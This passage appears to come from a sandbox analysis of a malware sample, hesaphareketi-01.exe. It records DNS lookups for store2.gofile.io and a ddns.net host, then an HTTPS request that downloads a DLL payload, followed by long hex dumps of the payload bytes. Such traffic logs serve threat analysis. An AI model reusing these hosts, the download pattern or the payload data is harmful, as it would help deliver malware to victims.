                                                                  Oct 14, 2021 12:20:57.549612999 CEST192.168.2.58.8.8.80x6bceStandard query (0)store2.gofile.ioA (IP address)IN (0x0001)
                                                                  Oct 14, 2021 12:21:41.223095894 CEST192.168.2.58.8.8.80xb075Standard query (0)atifgabuying.ddns.netA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Oct 14, 2021 12:20:57.565828085 CEST8.8.8.8192.168.2.50x6bceNo error (0)store2.gofile.io31.14.69.10A (IP address)IN (0x0001)
                                                                  Oct 14, 2021 12:21:41.240967989 CEST8.8.8.8192.168.2.50xb075No error (0)atifgabuying.ddns.net185.66.91.154A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • store2.gofile.io

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.54976231.14.69.10443C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2021-10-14 10:20:58 UTC0OUTGET /download/a3cd5cbe-ac92-4ed8-a75c-282d6ded34cd/Gppieq.dll HTTP/1.1
                                                                  Host: store2.gofile.io
                                                                  Connection: Keep-Alive
                                                                  2021-10-14 10:20:58 UTC0INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Access-Control-Allow-Origin: *
                                                                  Content-Disposition: attachment; filename="Gppieq.dll"
                                                                  Content-Length: 710656
                                                                  Content-Type: application/octet-stream
                                                                  Date: Thu, 14 Oct 2021 10:20:58 GMT
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  X-Content-Type-Options: nosniff
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Powered-By: Express
                                                                  X-Xss-Protection: 1; mode=block
                                                                  Connection: close
                                                                  2021-10-14 10:20:58 UTC0INData Raw: f1 27 82 0c a4 fc 42 5a ec a3 39 9e a5 90 38 b6 57 69 e4 52 33 68 0c 81 72 6b 99 1f 7c 82 b5 4a 6b 8f e7 46 33 d0 de 8f d5 00 30 9f 01 ba a4 2f a9 48 35 2c ff bc df fd 7f 2a e7 2a 83 ee d6 4e af 55 45 4f 18 30 c6 ad 5d 56 b4 4d a0 97 0a 24 4e c6 57 e4 8b bf 03 23 5e c9 b3 79 49 db 53 38 4c eb 9d ea a5 fd 35 84 ff d6 2e 17 4d f4 c0 79 ab 9d a5 0a 37 c9 f3 2c e2 77 49 ee e4 9b 6a 58 e7 c0 38 3b 54 21 1b 4c d3 91 ef c2 97 a4 66 0f 35 c8 fe 34 e9 02 5a e0 44 cd 77 07 b6 a6 4a bd 34 b4 6a dd 2d 3c 80 19 47 0f 16 4c f6 83 26 77 f4 73 8b 76 41 cf 27 cf 9f f2 a5 8e 34 d3 31 87 b4 91 06 b7 87 80 39 40 2c fc 56 6b 0e 8a f2 55 5e 98 a4 66 26 00 07 5c d5 36 55 b2 da c6 0d 74 33 9c 05 e7 19 0d d8 d1 bf 24 1d 7b 20 11 45 9d 45 f9 8a e6 a9 16 34 1b 08 38 51 02 86 5d 21
                                                                  Data Ascii: 'BZ98WiR3hrk|JkF30/H5,**NUEO0]VM$NW#^yIS8L5.My7,wIjX8;T!Lf54ZDwJ4j-<GL&wsvA'419@,VkU^f&\6Ut3${ EE48Q]!
                                                                  2021-10-14 10:20:58 UTC1INData Raw: 65 ae 84 e3 75 3c 88 01 3b c0 48 06 7a f7 d7 c1 a7 e1 6b c5 31 c4 04 30 b7 25 ef af 49 63 bc f6 2d 8f 64 3b cb b3 72 0a 9c 7d 05 df 9b c0 4e 95 68 51 50 0c ba 65 7d 46 4e 86 fe d2 b1 8b 27 34 c2 9c 01 ac 90 6f f0 8c a1 9b a9 cc e6 e6 97 78 2a 59 44 a9 bf 23 2f a2 8f f5 3c aa 99 59 82 e3 56 b2 57 f0 93 1a 30 a6 6c af 6f 50 c9 5c 67 46 1a 5b 12 13 cf 9d 2d f8 0d 90 ff 88 83 71 c4 9c eb 11 ed 59 a2 aa 48 97 5d 6c 26 7a ff d8 36 42 5f fa 57 3b f2 12 00 a3 86 3b 1a a4 57 7d 03 09 de 82 9d ea ee 1e 18 ec 15 e1 8e 66 86 a2 0f 9b 17 93 dc f9 2c 03 d9 f3 ce bc b1 50 e6 d2 68 5f 4b b2 f8 4f f9 89 c7 89 b1 15 5c 04 be 9b ff 28 d8 04 11 c0 03 00 17 fa 54 e8 d4 36 18 92 d1 13 05 f9 a2 eb b7 a3 19 cb 9f 1f e0 b0 38 fc 91 cd 2b fc 92 7f 8a c0 e2 94 d0 e6 ab 9b 8f aa d7
                                                                  Data Ascii: eu<;Hzk10%Ic-d;r}NhQPe}FN'4ox*YD#/<YVW0loP\gF[-qYH]l&z6B_W;;W}f,Ph_KO\(T68+
                                                                  2021-10-14 10:20:58 UTC3INData Raw: dd fb 8a 5e 2d 5b 33 85 ae c1 93 59 04 28 50 3c b7 f8 70 d7 6e ba fc bf 69 82 4f 30 85 50 af 60 1c 2a 5e 2a 75 10 84 4c a0 f8 6c ac db 7d 54 de 5b a9 cd 9c 5a c7 c9 7b 6f 7f 9d dc 5f b7 a9 73 39 87 98 f7 0f a2 29 bb c8 4a 67 5d d2 bb b3 12 99 d4 14 22 4f ca e7 7f 9c 47 39 2a 46 ef e6 f4 82 bb 6d 02 17 58 10 9a 39 3b 5d 1a 89 39 27 fc 79 5f 6f f8 8c c5 f2 29 b8 3f 8c 56 11 19 a6 91 52 7d cc 8e df 83 21 e9 a9 2d 6f 9e 89 31 1a 55 44 2a 5d 8c 94 4c c5 1d c0 50 41 72 7c 5e 8f 10 fe ea dc 9c 8b 43 bf 6e 94 c1 c5 be b9 35 c5 24 c6 81 3e ed 43 23 16 57 97 e5 a8 b7 46 f0 96 7f d7 4f ae 8e 20 42 2f 39 09 f9 e5 c1 65 ec 07 35 5e 5a b6 94 b6 d1 4e 09 6c 02 4b 5d 13 6c b6 8f 75 9b 43 5e fd dd f0 12 25 62 1c c3 dc d4 49 bd a3 77 a4 e1 bd 72 02 c8 86 d9 e6 0d c8 c7 18
                                                                  Data Ascii: ^-[3Y(P<pniO0P`*^*uLl}T[Z{o_s9)Jg]"OG9*FmX9;]9'y_o)?VR}!-o1UD*]LPAr|^Cn5$>C#WFO B/9e5^ZNlK]luC^%bIwr
                                                                  2021-10-14 10:20:58 UTC4INData Raw: 32 c1 8c 03 dc 57 d4 c2 65 15 79 84 67 8a a7 b2 f5 cf bd bc 8c 16 bf dd 8e cc 69 4c 79 aa 96 db 01 42 93 50 47 ae f5 c5 5c 03 c6 5c 8d 0f 5a 06 84 e9 f7 00 a1 a6 e2 33 f5 29 ff a5 9f 39 42 59 6e 6e 0b 42 45 6e e5 e0 52 70 0b 00 99 de 3a 45 e3 f0 ea 13 49 0a 51 f9 9c 6f d0 dd 43 dd d9 c0 7c c3 c7 90 a7 3d 33 dd 01 00 71 b0 ba ee 84 b5 43 18 36 cb 62 cd 31 ba 1f e6 b2 41 83 c9 5b 3a b3 31 3e 81 8c 02 79 85 41 48 df 03 6c 9e 92 d8 33 01 08 5e 96 72 f4 71 84 e1 19 cf 18 c7 0e e3 02 77 63 3c 6d 47 7f f6 2b f2 9e 52 68 f5 f8 d0 c2 7c 40 11 c3 1e 2b 03 a3 c6 9b dd 62 7b ea ac e4 e4 a5 a2 eb 96 64 8e 5f 06 ea 33 03 a0 31 d1 2e 73 06 59 70 5b 0a bc 80 a3 af 2f b0 de 3b 55 3c af 25 e0 01 01 3b 5b 8a 18 bb f4 a3 f7 f6 17 20 9f b6 27 86 63 97 9f c8 c1 24 be fd bb 46
                                                                  Data Ascii: 2WeygiLyBPG\\Z3)9BYnnBEnRp:EIQoC|=3qC6b1A[:1>yAHl3^rqwc<mG+Rh|@+b{d_31.sYp[/;U<%;[ 'c$F
                                                                  2021-10-14 10:20:58 UTC8INData Raw: 4d f3 2b 18 d6 e2 63 bc 07 5c 5c d0 71 86 7f 8e e5 6c e7 8a 2d dc 5b 27 d4 0c 1d 89 ab f6 05 70 a5 04 3e f9 6b ff dc 51 4f 84 b1 54 b4 36 06 f5 64 8b 7e f8 5c 38 55 e2 04 ae df bc ae 94 b5 d8 23 42 e6 bf 9c a6 23 7b bc 95 51 00 f0 1f 5c be 46 01 01 83 29 f6 07 0f 65 dc eb 21 67 fc b3 12 6f 9d 98 e9 ce dc 74 c9 a2 b1 39 4b 07 da 57 eb 92 e9 ed 0d 60 15 33 d6 49 43 fe ef 2e 47 cd 45 79 f6 35 20 50 6d 1d 81 87 fb 93 a7 ba ec 28 3c ad c1 af 12 df 4b e3 06 9f 97 47 25 1a 13 d1 ac 81 c7 3c dc cf 86 66 d4 d7 50 b4 79 df ba 52 78 d5 f4 27 cb 26 9f f6 99 2c 36 b8 ef eb 52 2f 33 9e 55 8a 6f 52 b7 4a 7c 6a 23 c9 2a d8 dc b3 65 d6 e3 21 02 0a 14 fb e8 51 98 25 4f 56 99 c0 6e 2a de 22 8d b9 8a c3 0f 82 10 85 9c 7a 23 68 82 28 48 0d d8 f7 98 1a f2 34 ee 7b c2 5c 86 f4
                                                                  Data Ascii: M+c\\ql-['p>kQOT6d~\8U#B#{Q\F)e!got9KW`3IC.GEy5 Pm(<KG%<fPyRx'&,6R/3UoRJ|j#*e!Q%OVn*"z#h(H4{\
                                                                  2021-10-14 10:20:58 UTC14INData Raw: ef 5b ff e9 f4 78 1a 58 3f 8d 1b 79 61 3a ae 18 38 5f 45 d8 d6 67 08 64 23 48 b8 fa 02 76 5c e9 a0 42 60 a6 3b 29 9b 33 ef 24 dc 3c 01 38 45 b2 18 53 4a 7c b2 1c fd c7 76 4f eb 7b 1d d2 f5 e7 55 a6 2f de 6c 51 68 eb 14 86 c6 0c 2f 02 7c 3c cc 89 ef 46 95 f3 f5 ef 13 16 b0 3f ad e5 59 a9 5b be 9a 55 c4 5e 38 06 29 d0 6b 86 7e 03 d4 e2 6b 57 1b f7 85 a8 76 3b b2 79 23 ba 4e eb f7 88 8d c7 6b 72 5e 14 a1 60 ba 33 76 d3 d0 27 48 8a f5 bb 6a d4 88 05 32 ad b4 75 7e de dc 71 4d ec d3 67 63 fc f5 ec 57 84 bb be 6f 66 91 e2 e1 5b 8d 57 ed 1d 79 4c 55 0f 09 c5 66 97 6b 1c 39 ea ba ab c0 6d 95 32 3c cf 80 0c d6 b3 69 71 90 d4 2a cd c9 fa 38 03 f0 6a aa 4e 55 e9 a9 6e fd d6 d4 3d 67 b8 65 74 f9 9d cf 76 e8 5b ab 4e ef c0 cc 56 02 22 96 2a 45 55 fa 8f 04 63 92 92 23
                                                                  Data Ascii: [xX?ya:8_Egd#Hv\B`;)3$<8ESJ|vO{U/lQh/|<F?Y[U^8)k~kWv;y#Nkr^`3v'Hj2u~qMgcWof[WyLUfk9m2<iq*8jNUn=getv[NV"*EUc#
                                                                  2021-10-14 10:20:58 UTC21INData Raw: c6 07 a5 17 94 36 af 73 18 1a 0a fa 3b c8 67 35 35 ac e4 04 cb a6 fc 85 b3 29 0e e8 ce 82 a9 98 aa 41 fc c5 4f db 04 8d 1c 4a 64 90 f5 7c 26 56 0f 5f b7 8c ed ef 07 80 3f 6f 45 ce f5 d1 ad 7b 5e 8e 40 b7 79 91 e4 d6 be e0 99 86 fa 11 b9 5d 11 d8 7a 7e a8 f8 d6 a4 97 66 0b 4b 1d 68 b1 79 e8 5d 7d a2 a9 10 03 a3 48 4b 80 e9 7b 43 a4 8a e7 27 bc c4 99 66 7f 54 b6 70 9c 93 c7 89 a0 23 62 5a f1 0b 5f 8c 9d a1 db be 32 2d cc bc 13 7b 53 ff 30 63 57 7e 05 eb 57 98 46 0f a7 49 e7 ca a1 9b 77 a2 b1 c2 54 53 a0 0b d1 d3 3c ad 2a 94 6a 36 f6 84 e8 84 39 91 68 dd f2 83 94 6f 16 c9 70 4b f3 a8 0a 72 9a 51 b4 84 b8 3b ad e9 12 1b e5 a5 58 43 d4 de f2 e1 3b ec 50 30 bd 1c be 73 70 d4 32 e0 8e e9 0f ab b9 15 6b 40 8b 17 15 18 0d a8 dd 09 1f b0 81 8a 32 fc 60 4e 12 c9 7b
                                                                  Data Ascii: 6s;g55)AOJd|&V_?oE{^@y]z~fKhy]}HK{C'fTp#bZ_2-{S0cW~WFIwTS<*j69hopKrQ;XC;P0sp2k@2`N{
                                                                  2021-10-14 10:20:58 UTC25INData Raw: 8a 3f be 82 9b 85 c0 f6 82 13 ef 0b 3e 73 ad bd ce 28 9a 41 52 8d 5a cc 5a 21 45 94 ec 58 fc 62 1b fc 47 4b 1b 92 c0 de 58 e4 b4 51 19 8a f5 c6 4e 9a 64 7a 12 32 60 63 e4 f8 ed 61 f1 8a e3 50 6c bc 8b 93 5c 96 89 c4 34 6c 39 29 49 f2 32 59 68 96 53 91 75 9a 37 7f 60 22 ff 3e a6 b5 a8 a8 11 64 11 b0 c9 83 0e 41 15 bc 03 12 62 19 af b9 6d 27 3f 32 2f 98 f2 f5 6b da 1f 8d c7 83 ce aa 0f 73 0d 0f d2 6a 19 10 32 31 b8 90 10 99 02 dd 93 a9 5b 95 67 d0 26 c8 af a5 0d e7 6b 8f 7c 40 39 35 4b e1 97 49 7f 43 b6 0f 15 2c cb 31 ac d3 f0 29 8f da 62 51 6c d1 26 3b fa ee 75 89 9f 41 c5 22 0c 1c 61 c7 4a 87 c4 bd d8 c0 3a d8 da 18 78 45 d5 20 de da 24 14 9e f4 22 dd 2a ee ff 13 01 29 f3 13 78 17 02 e3 1b a5 9e 00 06 c2 08 ce 89 5f 22 78 fb 52 d1 2a f8 de 10 ad b3 b3 28
                                                                  Data Ascii: ?>s(ARZZ!EXbGKXQNdz2`caPl\4l9)I2YhSu7`">dAbm'?2/ksj21[g&k|@95KIC,1)bQl&;uA"aJ:xE $"*)x_"xR*(
                                                                  2021-10-14 10:20:58 UTC34INData Raw: 6e 17 0a c0 c8 3a 2d 3d e3 94 3c b0 fb 89 99 1d b7 62 02 2c a5 f1 03 ae a2 e4 41 ac 51 e4 19 bb 73 fb bf b3 a8 a3 c0 a9 7b a7 95 9b 63 e8 ff cf a3 3d 37 f6 16 54 0c 40 f3 0f 0d 51 01 e7 95 73 de 2a 48 9a 08 5a 35 b5 f3 a6 ec 85 e7 61 f4 f9 19 44 a9 a1 40 d2 5c cb e3 cb 69 0d ed 52 88 35 dd d0 06 ba dc 83 5e bc 5f 6c 91 50 72 ef 8f 28 ed cc 0f 96 66 34 00 2a af 66 ca d2 4d e3 41 02 e9 ef 00 ff 74 bc 32 44 4e 5d 88 52 3b 11 61 64 c3 67 c8 e7 bb e9 11 cb d3 e7 8f ae a1 e2 5f 5e 37 9c 2e 91 f6 ad cd 49 d8 1b 85 78 39 68 92 f1 94 19 16 16 e4 8a 88 45 81 d7 bc 84 e4 ce dd 8b 56 89 6e 23 6a 5b 38 8d b9 09 5c 61 75 d3 f5 49 26 19 5d d9 8f 5f f2 3b af 5b 93 07 f1 d6 f6 73 2d a0 8c 0b 82 6d 9f 01 74 26 08 35 86 f5 24 29 b4 3a 46 6e 20 aa e1 59 be 97 d9 11 af ab 1c
                                                                  Data Ascii: n:-=<b,AQs{c=7T@Qs*HZ5aD@\iR5^_lPr(f4*fMAt2DN]R;adg_^7.Ix9hEVn#j[8\auI&]_;[s-mt&5$):Fn Y
                                                                  2021-10-14 10:20:58 UTC45INData Raw: 29 22 00 10 22 63 fe 66 be 16 d9 48 d1 d5 08 c3 84 10 13 de 03 5a b3 19 73 e0 e4 8e a7 5a 40 a7 2e 3e 9b 2d 79 64 c6 fe f1 00 14 e1 ae ad a0 a5 92 e8 6d 14 30 51 87 19 ec b7 16 1e ce 95 65 9d f0 4f 8e 76 05 4d 64 c0 09 27 32 41 30 c8 64 04 6a 14 22 03 65 90 7d d8 64 19 f2 8c 37 a2 7d b9 98 89 20 48 61 fe 1f 2d 9f a1 60 f2 6e 67 1a 0a 04 bf 0a 17 81 6e 98 34 4b 08 f5 1c 70 b3 ef 35 35 4a c5 91 1f 3a 96 0a 94 42 ca 9e 7a 74 4e 97 a2 38 7b fd e9 66 20 a3 cf e7 6b 9c bf 5f 71 95 30 da 6b c3 bc af d8 13 6d be 51 81 cc 7b e4 da dd 37 16 a2 b6 95 5a 7f 64 39 11 4c 2c b5 5e c9 14 76 3a c0 93 7b b8 11 ac 74 4e 9c 17 7f 28 84 28 9c 8a 7b c5 93 19 71 e3 4a c2 27 e8 f9 29 72 52 77 95 ce 89 37 c2 00 a0 89 1b da 6f 0f 78 3d 5a b6 4f 66 7d 38 35 51 0c ec 10 8a 25 d4 b5
                                                                  Data Ascii: )""cfHZsZ@.>-ydm0QeOvMd'2A0dj"e}d7} Ha-`ngn4Kp55J:BztN8{f k_q0kmQ{7Zd9L,^v:{tN(({qJ')rRw7ox=ZOf}85Q%
                                                                  2021-10-14 10:20:58 UTC56INData Raw: 3c b9 50 18 70 75 08 4c e3 95 3e fd 68 89 7a 02 7f f9 5c 17 bb 75 d4 7e 41 a5 8c 90 58 a6 f2 f4 79 66 34 af 1f 53 fc 1e d9 48 19 35 93 53 3d 00 7b c6 d4 5a 36 49 41 3e c6 ba a0 ac ef e0 50 26 0c 62 db 65 a2 6a b3 df 76 27 1a c7 0c 5e fa 7a 72 c8 6e 04 b3 d5 1b 01 09 1b c5 f4 c1 6a f4 42 43 0e f3 5c 21 35 cb 51 d2 3e cb 02 68 19 ae 8d c7 2b aa 85 46 de d8 47 e5 90 73 44 fa 3f cb a9 24 c5 43 2f 41 43 68 8e 0a ac 62 ae c1 7e f2 32 14 59 32 ea 9f b0 f6 63 1b 60 5a 44 8e 71 06 c9 67 84 ab f4 6c 9f 6f 76 44 c0 bc 2c ff 6a 90 b2 4b 2b c2 66 95 4e 5f c0 6a 45 5e f6 1e e4 a5 a4 87 e2 01 e7 be 17 ae 09 82 8f 57 2a 39 55 da 85 0c 28 69 9d 3a 6f b9 c0 67 a7 85 e5 e2 b6 3d ae c5 0a a5 fa ca 46 89 2a 1e 4a fc c8 c4 30 97 7a f8 b9 28 88 26 b3 e4 13 0d 3b 24 47 66 eb 43
                                                                  Data Ascii: <PpuL>hz\u~AXyf4SH5S={Z6IA>P&bejv'^zrnjBC\!5Q>h+FGsD?$C/AChb~2Y2c`ZDqglovD,jK+fN_jE^W*9U(i:og=F*J0z(&;$GfC
                                                                  2021-10-14 10:20:58 UTC57INData Raw: d6 95 81 f8 c8 64 be 94 74 f9 6a 99 bd dd 70 15 bb 4a 25 e3 77 fb e5 21 06 4e 8a 2d be d9 a0 56 16 e8 1c 0a 80 60 05 66 4e 67 de b7 d9 98 06 88 42 78 6c c3 b6 a6 53 1a 76 34 8f 09 5d 20 47 ca 18 27 ea 90 1a 6d 64 de f0 24 b5 b4 a4 12 e1 8e 15 f9 95 24 49 14 54 9d 44 0f 3f b1 0d af 9a b4 40 dc 89 35 80 5c b5 07 13 44 23 cd 58 10 24 9e 20 7f c0 99 ef 8a d1 2a 57 7f 5d 94 4d 20 8c ec 22 d5 95 e5 77 b8 d5 ce 64 7c cc 29 27 52 2f b8 a6 b9 4b b5 82 49 38 25 39 80 c5 a9 53 fe 0d 49 9c 5e 02 38 fd 6a 5b 0a a8 5d 15 d6 64 28 40 dd fb eb 4b fc 72 63 f6 2e 25 4f 45 d9 6e 07 16 cf 82 3e 85 e7 0e 86 aa de f4 7d 36 a6 83 45 5c f2 b2 a3 b2 8e 0b 43 07 f0 ce 34 ec 8b 13 7c 9f 20 1d 98 f1 4b b4 27 f4 41 0d e9 0e 43 40 62 a4 1d 5d 46 02 3d a0 35 08 b9 3a 4c 85 ff 9f 27 83
                                                                  Data Ascii: dtjpJ%w!N-V`fNgBxlSv4] G'md$$ITD?@5\D#X$ *W]M "wd|)'R/KI8%9SI^8j[]d(@Krc.%OEn>}6E\C4| K'AC@b]F=5:L'
                                                                  2021-10-14 10:20:58 UTC64INData Raw: c4 b3 60 ee ff 0a 68 c8 09 75 27 a4 5d c6 d2 4e 26 a3 b0 c9 e7 c1 3d 5e a6 a7 c3 54 54 c9 d2 62 1e 43 5f c4 98 25 65 91 89 cc 1e 62 5f 8b ce 1b 34 c9 42 cb 62 cc 36 77 e5 04 ec bf 0d 56 53 a3 f2 0f 03 17 ce ea 16 16 74 54 bc fb 9a 9d 98 28 27 31 9c 3b c4 b0 6d a9 85 46 6a 88 84 af e7 70 2d d7 10 46 6d 75 4b e1 9b 0c 14 94 85 c2 8f 20 57 8b fd 84 81 3d 44 71 f7 3a ea 4f cb bc 8b 52 1c e7 f4 72 f8 fd 1a 10 88 8a 65 fb d4 dc 17 6e f4 4b 61 cc 85 76 8b 14 26 ab 92 3c 65 19 fe 50 61 21 a8 8b af c7 6c 99 93 f4 cf 91 d4 e0 d3 33 68 6e 79 f7 7e f8 4c 4e a1 9e 1b ff bd a5 1e 71 5e bb d7 2f 4a b6 a1 1d 9f 22 dc 8e ff 0f f6 08 fd 61 0d 2e 52 60 47 a7 0f 02 df 42 77 2e f4 56 de f6 55 2d fc 8e 91 1b 50 d7 1d 08 e2 c6 5b ad cd 9d 9a bb e3 bf f9 c8 f4 eb 5a cf fd 9b 98
                                                                  Data Ascii: `hu']N&=^TTbC_%eb_4Bb6wVStT('1;mFjp-FmuK W=Dq:ORrenKav&<ePa!l3hny~LNq^/J"a.R`GBw.VU-P[Z
                                                                  2021-10-14 10:20:58 UTC79INData Raw: 5f a1 ae b8 17 f9 6d b3 ee 95 a9 c5 11 93 8d 17 ac f5 b5 99 11 99 63 6b 20 02 b9 65 14 aa ff ec 91 3c 53 90 3a 20 b6 fa 81 d3 1f dd 6d 7c e9 b8 55 12 7a bd 50 97 2e b4 5f 07 45 ca eb e0 26 2d 31 3d 8f 03 c7 66 25 21 6c cc 5a ab 9b 84 5b 99 b0 34 d7 d4 85 5b 58 b8 d6 23 9f cc 38 a7 e4 7b fb d9 7a 75 0b b9 75 97 4f 30 51 10 22 35 24 e6 90 59 37 ce 4a 1e 37 36 43 c9 3a ff 39 71 45 89 54 cd 8f 58 71 3e ce 45 4b df e9 7b 3b b2 a7 8f 7e 12 59 7c e7 d4 a7 e2 cb 89 33 5a 69 83 e7 f7 fb 41 09 d3 1b 21 34 2a 05 91 67 ed f3 ae bf b3 81 ed 51 53 90 42 61 8b 3a 53 c5 7f a2 73 1c 92 3e 8b e8 54 62 f8 1c 09 55 78 a1 28 84 9d aa 8f cb 4d 58 a3 1b 4e 9c cd f5 1f 07 f0 a0 c9 8c 81 d1 73 07 fe 0c ef b8 36 7a 24 85 d3 1e 71 ae c7 ff 43 13 d4 67 0c a7 7e bf bc 4a fe 23 e4 d6
                                                                  Data Ascii: _mck e<S: m|UzP._E&-1=f%!lZ[4[X#8{zuuO0Q"5$Y7J76C:9qETXq>EK{;~Y|3ZiA!4*gQSBa:Ss>TbUx(MXNs6z$qCg~J#
                                                                  2021-10-14 10:20:58 UTC95INData Raw: ed e3 0d 9e b4 e2 aa 66 50 4d 7b 77 7d 41 dd 4d 71 17 36 c0 59 93 7c cf 05 b3 c6 04 c3 4f 57 74 fa 8c 25 00 ca 56 4b 6c 51 cd 3f 28 44 ea 23 94 95 aa 3e 3f 7e a0 92 f0 62 c6 d9 6f 38 f1 70 10 fc 6d 28 71 12 62 f9 5e f3 f1 f5 7a 86 5b cd 27 fe 00 25 81 94 e6 c7 3d 1c 28 78 1f 81 73 fb 41 00 f9 4a 41 37 4f 64 cb 4a ce 93 bb f8 7d 6b 5b 10 a2 d8 e0 b1 be 68 ec 20 cf 14 1d 46 7f 6c 4e ce 78 f1 f6 ed 80 8c 26 39 e1 26 09 91 4d 29 ec 89 66 b2 45 49 b2 25 e8 f3 85 1f eb f6 0c ff ee f3 e4 8b 6b 79 81 ef fe 3a b4 f0 34 53 72 95 d4 ff 88 50 24 25 ab d4 cf 96 21 ed 2b ca bf f4 c4 ba 96 af 2e a3 08 64 0d 9a 4d e8 84 e5 7e f9 f4 b3 7f 47 85 b4 59 97 2b 88 02 1f ab 5f 82 98 37 99 a3 c6 19 80 45 d4 27 a4 0d a7 ca ef 81 62 47 f7 55 9e 18 88 9d 28 7b 33 63 3d aa 6f de 21
                                                                  Data Ascii: fPM{w}AMq6Y|OWt%VKlQ?(D#>?~bo8pm(qb^z['%=(xsAJA7OdJ}k[h FlNx&9&M)fEI%ky:4SrP$%!+.dM~GY+_7E'bGU({3c=o!
                                                                  2021-10-14 10:20:58 UTC96INData Raw: 1a 21 a2 23 d5 30 2f 27 aa 75 cc 19 46 a3 f5 5b b9 68 28 84 c3 12 30 76 43 0a 04 d1 32 90 1f 0b 2e 01 72 f4 20 f0 c0 8c f3 0e 5d 51 1c 98 9b d6 9f 6c 72 4b 1a 36 eb 75 7e df b3 65 4b b8 8f 33 c4 fb 4b 56 e5 72 cb 4a 56 45 e9 b4 45 f3 92 6a 03 69 c4 c9 1a bb 65 45 90 da 64 c9 cc 17 1e 12 24 25 0f 7c eb 3e 74 2a be c9 41 14 56 be e3 37 b8 93 b9 2d 7b f6 ab 87 33 60 1a 68 fc 8e 76 d4 11 a9 66 d5 b5 9d 0b 30 32 ab 14 b2 a5 a9 b2 de 17 d5 85 93 07 ec 26 31 5e b1 b7 c1 5e d5 f4 17 43 89 fe 9e 6b 39 b7 46 3d 29 5c 7d 6b 95 08 9a cf 9c 11 99 9c ff 68 99 53 e5 ff 18 0b d6 02 78 1b 42 6b 1e 5e 48 b1 97 21 7c 5a 30 15 f9 3c 4b 57 35 33 43 0f 1a 86 ce 9f eb fa ba ba 86 2c ac d7 9f 84 7f a3 b9 a6 99 10 65 a6 1a 07 cd 7e 1c 7f f7 0e 44 34 a4 f9 20 10 d4 9e 08 44 34 8d
                                                                  Data Ascii: !#0/'uF[h(0vC2.r ]QlrK6u~eK3KVrJVEEjieEd$%|>t*AV7-{3`hvf02&1^^Ck9F=)\}khSxBk^H!|Z0<KW53C,e~D4 D4
                                                                  2021-10-14 10:20:58 UTC112INData Raw: bb 6c d9 80 f9 ed d4 77 6c ac 9a 64 10 ff 18 67 d5 37 4a ac 67 bb e7 b0 c6 02 f5 75 13 00 f7 e6 c4 36 b7 ba db 50 29 bd 69 27 fc 8b 25 75 9a 4f d2 4b 8a 40 20 44 74 54 df ef 3c 1c 82 4f 1f a6 e3 c1 68 41 d9 84 0e 2d 27 80 93 83 50 f5 2f 88 87 40 0c fd 8b a7 80 5c 79 34 7a 15 7a d6 92 26 6b 86 1d a6 0b e1 14 eb 62 9c 27 65 ba e1 8f 14 77 02 53 35 1b 03 10 04 e6 c8 2b b2 04 ba 59 4e df c6 44 09 be 9c 3f 14 6f 2c ad 2d 65 09 b1 a9 9d ab e3 1c 88 88 68 c1 fa 8a 10 80 2c 06 4a 4f 9a d8 bd dc 0d f8 96 e4 f0 84 ac 85 ae 40 c2 ba a5 70 31 6a ab be b3 76 79 4e 6d 13 ac 51 45 77 96 83 00 20 21 ab 5c 01 38 8d 0d 62 cb d6 d3 9c 0d bf 49 27 4b 26 10 13 58 7e bd 5f 7e 44 61 22 33 87 30 be c9 8c cf 8a 7e 3b 83 5b 65 41 a0 af da 93 5d 39 83 3b f1 a7 e9 81 04 da 56 91 57
                                                                  Data Ascii: lwldg7Jgu6P)i'%uOK@ DtT<OhA-'P/@\y4zz&kb'ewS5+YND?o,-eh,JO@p1jvyNmQEw !\8bI'K&X~_~Da"30~;[eA]9;VW
                                                                  2021-10-14 10:20:58 UTC128INData Raw: 8c 81 34 1a 67 bc 79 e6 6d 6b c5 15 4e 47 e8 fb 06 a9 e3 a2 8e 58 7a 9f 6a 36 df 03 ff a8 ad bf c4 1e ea 9e 39 1f af bb a1 d6 86 f9 59 07 4b b5 f2 d6 9c 04 c9 8c ee 5b 1e ed 07 48 ca 7c cc 10 bd b7 24 0d d3 ac 74 73 d2 de f4 75 20 ea 1c cb 94 b5 e3 42 04 6b 18 03 4f b8 2c 41 bd ae 0a 15 05 e8 74 ac 52 5d e4 8e d0 4a 8f 69 ee 51 37 a0 9a 18 42 c5 57 c5 ed df d3 38 25 0a 5d a4 86 fa 0e c4 d4 5f 48 a9 6a b6 07 8b 08 3b 24 2c a7 66 51 10 a7 f8 01 83 2b c6 6d 10 69 86 a3 b7 85 bd 67 23 db bf 21 e1 f3 28 f4 52 47 ff 21 ee 36 ad 1a 6b 53 f9 f3 a3 10 8d 39 7b 11 7c ad 37 50 41 0a 46 af 6d 3a 63 a8 ff fb b0 35 f0 57 7f 6b b0 a8 50 e9 a9 a1 0c fc d8 4c a8 46 dd ad 09 ae 0f fc 4a 29 28 49 e1 69 f0 25 03 fb f7 58 c6 d2 b6 5f 54 e2 bc 8e b5 a8 d2 07 71 20 65 3a c0 14
                                                                  Data Ascii: 4gymkNGXzj69YK[H|$tsu BkO,AtR]JiQ7BW8%]_Hj;$,fQ+mig#!(RG!6kS9{|7PAFm:c5WkPLFJ)(Ii%X_Tq e:
